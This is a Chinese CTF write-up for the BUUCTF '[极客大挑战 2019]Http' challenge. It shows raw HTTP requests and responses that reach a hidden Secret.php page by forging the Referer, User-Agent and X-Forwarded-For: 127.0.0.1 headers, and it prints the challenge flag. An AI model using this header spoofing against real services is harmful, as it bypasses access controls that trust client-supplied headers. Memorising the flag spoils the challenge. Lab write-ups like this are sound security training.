题目链接:https://buuoj.cn/challenges#[极客大挑战 2019]Http。
访问环境如下。
该页面的响应包如下。
HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 16:21:45 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 4065
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML>
<html>
<head>
<title>Syclover</title>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<!--[if lte IE 8]><script src="assets/js/ie/html5shiv.js"></script><![endif]-->
<link rel="stylesheet" href="assets/css/main.css" />
<!--[if lte IE 8]><link rel="stylesheet" href="assets/css/ie8.css" /><![endif]-->
<!--[if lte IE 9]><link rel="stylesheet" href="assets/css/ie9.css" /><![endif]-->
</head>
<body class="landing">
<style>
p,h2{
cursor:default;
}
</style>
<!-- Page Wrapper -->
<div id="page-wrapper">
<!-- Banner -->
<section id="banner">
<div class="inner">
<h2>Syclover</h2>
<p>Hi Hackers<br />
Here is the secret website <br /> of the Syclover <br />
</div>
<a href="#one" class="more scrolly">Learn More</a>
</section>
<!-- One -->
<section id="one" class="wrapper style1 special">
<div class="inner">
<header class="major">
<h2>欢迎来到西南某最大卖鞋厂商 !<br />
三叶草安全技术小组(Syclover)</h2>
<p>当黑客帝国的梦想成为现实,你就是下一个奇迹缔造者!<br />
三叶草安全技术小组(Syclover)等待着同样热爱技术的你~<br />
Syclover2019招新群:671301484</p>
</header>
<ul class="icons major">
<li><span class="icon fa-diamond major style1"><span class="label">Lorem</span></span></li>
<li><span class="icon fa-heart-o major style2"><span class="label">Ipsum</span></span></li>
<li><span class="icon fa-code major style3"><span class="label">Dolor</span></span></li>
</ul>
</div>
</section>
<!-- Two -->
<section id="two" class="wrapper alt style2">
<section class="spotlight">
<div class="image"><img src="images/pic01.jpg" alt="" /></div><div class="content">
<h2>小组简介</h2>
<p>·成立时间:2005年3月<br /><br />
·研究领域:渗透测试、逆向工程、密码学、IoT硬件安全、移动安全、安全编程、二进制漏洞挖掘利用等安全技术<br /><br />
·小组的愿望:致力于成为国内实力强劲和拥有广泛影响力的安全研究团队,为广大的在校同学营造一个良好的信息安全技术<a style="border:none;cursor:default;" onclick="return false" href="Secret.php">氛围</a>!</p>
</div>
</section>
</section>
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/jquery.scrollex.min.js"></script>
<script src="assets/js/jquery.scrolly.min.js"></script>
<script src="assets/js/skel.min.js"></script>
<script src="assets/js/util.js"></script>
<!--[if lte IE 8]><script src="assets/js/ie/respond.min.js"></script><![endif]-->
<script src="assets/js/main.js"></script>
<footer id="footer">
<ul class="copyright">
<li>© Syclover</li><li>Design: Cl4y</li>
</ul>
</footer>
</body>
</html>
可以发现,在页面的源代码中存在 "Secret.php" 页面,访问该页面的响应包如下。
HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 16:20:03 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 2377
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html>
<style>
.slickButton3 {
margin-right:20px;
margin-left:20px;
margin-top:20px;
margin-bottom:20px;
color: white;
font-weight: bold;
padding: 10px;
border: solid 1px black;
background: #111111;
cursor: pointer;
transition: box-shadow 0.5s;
-webkit-transition: box-shadow 0.5s;
}
.slickButton3:hover {
box-shadow:4px 4px 8px #00FFFF;
}
img {
position:absolute;
left:20px;
top:0px;
}
p {
cursor: default;
}
.input{
border: 1px solid #ccc;
padding: 7px 0px;
border-radius: 3px;
padding-left:5px;
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
-webkit-transition: border-color ease-in-out .15s,-webkit-box-shadow ease-in-out .15s;
-o-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;
transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s
}
.input:hover{
border-color: #808000;
box-shadow: 0px 0px 8px #7CFC00;
}
</style>
<head>
<meta charset="UTF-8">
<title>SycSecret</title>
</head>
<body background="./images/background.png" style="background-repeat:no-repeat ;background-size:100% 100%; background-attachment: fixed;" >
</br></br></br></br></br></br></br></br></br></br></br></br>
<h1 style="font-family:arial;color:#8E44AD;font-size:50px;text-align:center;font-family:KaiTi;">
Please use "Syclover" browser</h1>
<div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</body>
</html>
可以发现,提示 "Please use "Syclover" browse",而 HTTP 中,"User-Agent" 标头用于标识客户端(即访问者)的一些情况(如使用的浏览器信息,主机信息等),因此使用如下请求包进行访问。
GET /Secret.php HTTP/1.1
Host: node5.buuoj.cn:27064
Referer: https://Sycsecret.buuoj.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Syclover/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
响应包如下。
HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 16:20:29 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 2387
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html>
<style>
.slickButton3 {
margin-right:20px;
margin-left:20px;
margin-top:20px;
margin-bottom:20px;
color: white;
font-weight: bold;
padding: 10px;
border: solid 1px black;
background: #111111;
cursor: pointer;
transition: box-shadow 0.5s;
-webkit-transition: box-shadow 0.5s;
}
.slickButton3:hover {
box-shadow:4px 4px 8px #00FFFF;
}
img {
position:absolute;
left:20px;
top:0px;
}
p {
cursor: default;
}
.input{
border: 1px solid #ccc;
padding: 7px 0px;
border-radius: 3px;
padding-left:5px;
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
-webkit-transition: border-color ease-in-out .15s,-webkit-box-shadow ease-in-out .15s;
-o-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;
transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s
}
.input:hover{
border-color: #808000;
box-shadow: 0px 0px 8px #7CFC00;
}
</style>
<head>
<meta charset="UTF-8">
<title>SycSecret</title>
</head>
<body background="./images/background.png" style="background-repeat:no-repeat ;background-size:100% 100%; background-attachment: fixed;" >
</br></br></br></br></br></br></br></br></br></br></br></br>
<h1 style="font-family:arial;color:#8E44AD;font-size:50px;text-align:center;font-family:KaiTi;">
No!!! you can only read this locally!!!</h1>
<div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</body>
</html>
可以发现,后端提示 "No!!! you can only read this locally!!!"。
而在 HTTP 中,"x-forwarded-for" 常用于标识客户端的 IP 地址,因此使用如下请求包再次访问。
GET /Secret.php HTTP/1.1
Host: node5.buuoj.cn:27064
Referer: https://Sycsecret.buuoj.cn
x-forwarded-for: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Syclover/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
响应包如下。
HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 16:20:56 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 2391
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html>
<style>
.slickButton3 {
margin-right:20px;
margin-left:20px;
margin-top:20px;
margin-bottom:20px;
color: white;
font-weight: bold;
padding: 10px;
border: solid 1px black;
background: #111111;
cursor: pointer;
transition: box-shadow 0.5s;
-webkit-transition: box-shadow 0.5s;
}
.slickButton3:hover {
box-shadow:4px 4px 8px #00FFFF;
}
img {
position:absolute;
left:20px;
top:0px;
}
p {
cursor: default;
}
.input{
border: 1px solid #ccc;
padding: 7px 0px;
border-radius: 3px;
padding-left:5px;
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
-webkit-transition: border-color ease-in-out .15s,-webkit-box-shadow ease-in-out .15s;
-o-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;
transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s
}
.input:hover{
border-color: #808000;
box-shadow: 0px 0px 8px #7CFC00;
}
</style>
<head>
<meta charset="UTF-8">
<title>SycSecret</title>
</head>
<body background="./images/background.png" style="background-repeat:no-repeat ;background-size:100% 100%; background-attachment: fixed;" >
</br></br></br></br></br></br></br></br></br></br></br></br>
<h1 style="font-family:arial;color:#8E44AD;font-size:50px;text-align:center;font-family:KaiTi;">
flag{3f4c7b42-8cf1-4b0a-9952-31ba3926b551}
</h1>
<div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</body>
</html>
而 flag 就在响应包中。
标签:box,极客,Http,ease,1px,2019,shadow,border,out From: https://www.cnblogs.com/imtaieee/p/18522678